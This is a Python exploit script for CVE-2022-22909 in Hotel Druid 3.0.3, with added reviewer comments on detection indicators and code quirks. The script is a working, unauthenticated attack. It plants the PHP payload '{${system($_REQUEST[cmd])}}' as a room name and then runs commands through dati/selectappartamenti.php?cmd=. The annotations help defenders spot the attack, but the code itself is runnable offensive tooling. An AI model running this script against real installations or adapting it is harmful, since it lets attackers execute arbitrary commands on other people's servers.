#!/usr/bin/python
import requests
import re
import argparse
# Title : Hotel Druid 3.0.3 - Remote Code Execution (RCE)
# Author : kaal
# Github : https://github.com/kaal18
# HackTheBox : https://app.hackthebox.com/profile/248660
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909
#
# Reviewer summary (defensive reading of what this file does): it POSTs a
# PHP template expression as the value of the ``n_app`` field of
# visualizza_tabelle.php (presumably the room-number field, per the comment
# in newroom) and then issues GETs to dati/selectappartamenti.php with a
# ``cmd`` query parameter. Indicators visible in this file that a defender
# can alert on: room/apartment records whose name contains
# ``{${system(...)}}``, and requests to /dati/selectappartamenti.php?cmd=.
# Mitigation: run a vendor-fixed release and restrict who can reach the
# application (the requests here carry no authentication).

# Year/database selector scraped from the start page. Only ever bound
# here: ``getDb`` assigns a *local* ``db`` and returns it, so this module
# global stays ``None`` for the whole run.
db = None
#URL = "http://127.0.0.1/hoteldruid"
# Base URL of the target instance; filled from ``-u`` by the argparse
# statements further down, which run at import time before ``main()``.
URL = None
def getDb() -> str:
    """Scrape the year/database selector out of the start page.

    Fetches ``URL + "/inizio.php"`` with no session or credentials and
    slices the value of the first query parameter in the ``nb_men``
    navigation link's ``href`` (presumably the ``anno`` value used by the
    later requests -- not confirmed here).

    Returns:
        The sliced value as ``str``.

    Raises:
        TypeError: if ``URL`` is still ``None`` (``-u`` not given).
        IndexError: if the expected anchor is not in the response (a
            different version, a login wall, or an error page).
    """
    url = URL + "/inizio.php"
    r = requests.get(url)
    # str(r.content) is the repr of the bytes body, so the splits run over
    # that text: take what follows "./inizio.php?", then what follows the
    # first "=", then everything up to the closing quote of the href.
    db = str(r.content).split('<a class=\"nav\" id=\"nb_men\" href=\"./inizio.php?')[1].split('=')[1].split('"')[0]
    # Local name only -- this does not update the module-level ``db``.
    db = str(db)
    return db
def already_exploited() -> None:
    """Check whether the apartments table already contains the marker string.

    GETs ``visualizza_tabelle.php`` and does a plain substring test for the
    template expression. If found, prints the URL it is reachable at and
    calls ``exit()``; otherwise prints "Exploiting " and returns.

    Note: ``db`` here is the module-level global, which is still ``None``
    at this point (``getDb`` binds a local), so the ``anno`` parameter is
    sent with a ``None`` value -- ``requests`` drops such entries from the
    query string, so the request presumably goes out without ``anno``.
    """
    url = URL + "/visualizza_tabelle.php"
    params = {'anno':db,'tipo_tabella':'appartamenti'}
    r = requests.get(url,params=params)
    payload = "{${system($_REQUEST[cmd])}}"
    # Regex match , Education purpose only
    # Non-raw string: ``\{``, ``\$``, ``\(`` and ``\_`` are invalid escape
    # sequences in a str literal (DeprecationWarning since 3.6, SyntaxWarning
    # in 3.12). ``reg`` is computed but never used; the decision below is
    # the substring test on ``payload``.
    pa = "\{\$\{system\(\$\_REQUEST\[cmd\]\)\}\}"
    reg = re.search(pa,r.text)
    #print(reg)
    if payload in r.text:
        print("Already Exploitd , Please visit below URL.")
        print(URL+"/dati/selectappartamenti.php?cmd=whoami")
        # ``exit`` is the site-module helper (SystemExit), not sys.exit.
        exit()
    else :
        print("Exploiting ")
        pass
def newroom() -> None:
    """Create a room whose ``n_app`` value is the PHP template expression.

    Two POSTs go to ``visualizza_tabelle.php``: the first with
    ``crea_app=1``, the second with ``crea_app='SI'`` (presumably the
    confirmation step of the create-room form -- not verified here). Only
    the second response is inspected: if ``r.ok`` is false (HTTP status
    >= 400) a message is printed and ``exit()`` is called. The local
    ``headers`` dict is built but never passed to ``requests``.

    Defender's note: the stored value is the artefact to look for -- a
    room record containing ``{${system($_REQUEST[cmd])}}``. The later
    request to ``dati/selectappartamenti.php`` implies the application
    writes room data into that generated PHP file, which is where the
    expression would be evaluated (inferred from ``exploit`` below).
    """
    db = getDb()
    url = URL + "/visualizza_tabelle.php"
    # n_app = 1337 is create new room nm.
    data = {'anno':db,'tipo_tabella':'appartamenti','crea_app':1,'n_app':"{${system($_REQUEST[cmd])}}"}
    headers = {}
    r = requests.post(url,data=data)
    data = {'anno':db,'n_app':"{${system($_REQUEST[cmd])}}",'crea_app':'SI','tipo_tabella':'appartamenti'}
    r = requests.post(url,data=data)
    # ``ok`` is True for any status below 400; it does not confirm that the
    # room was actually stored.
    if r.ok:
        print("Room is added With payload . .")
    else :
        print("Sory room can't be added")
        exit()
def exploit() -> None:
    """GET ``dati/selectappartamenti.php?cmd=whoami`` and print the response.

    Prints the HTTP status code, the response body and the final URL
    (``r.url``, i.e. after any redirects ``requests`` followed). The
    command is hard-coded to ``whoami``; nothing here checks whether the
    marker was actually evaluated server-side.

    Defender's note: this request shape -- a ``cmd`` query parameter on a
    file under ``/dati/`` -- is the second indicator in this script, and
    is visible in web-server access logs.
    """
    shell = 'whoami'
    url = URL + "/dati/selectappartamenti.php"
    params = {'cmd':shell}
    r = requests.get(url,params=params)
    print("status Code : ",r.status_code)
    print(r.text)
    print("Exploitation url : " ,r.url)
# Parsing Arguments
# Runs at import time (no ``__main__`` guard), so importing this module
# parses sys.argv and prints. ``-u`` is not marked ``required``: when it is
# omitted ``args.URL`` is ``None`` and the first ``URL + "/..."`` in
# ``already_exploited`` raises ``TypeError``.
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url',type=str,dest='URL',help="Provide URL Ex. http://127.0.0.1/hoteldruid ")
args = parser.parse_args()
print("You entered : ",args.URL)
# Rebinds the module global read by every function above.
URL = args.URL
def main() -> None:
    """Run the three steps in order: pre-check, create the room, trigger.

    ``already_exploited`` and ``newroom`` may terminate the process via
    ``exit()`` before ``exploit`` is reached.
    """
    already_exploited()
    newroom()
    exploit()
# Unconditional entry point (no ``if __name__ == "__main__":`` guard).
main()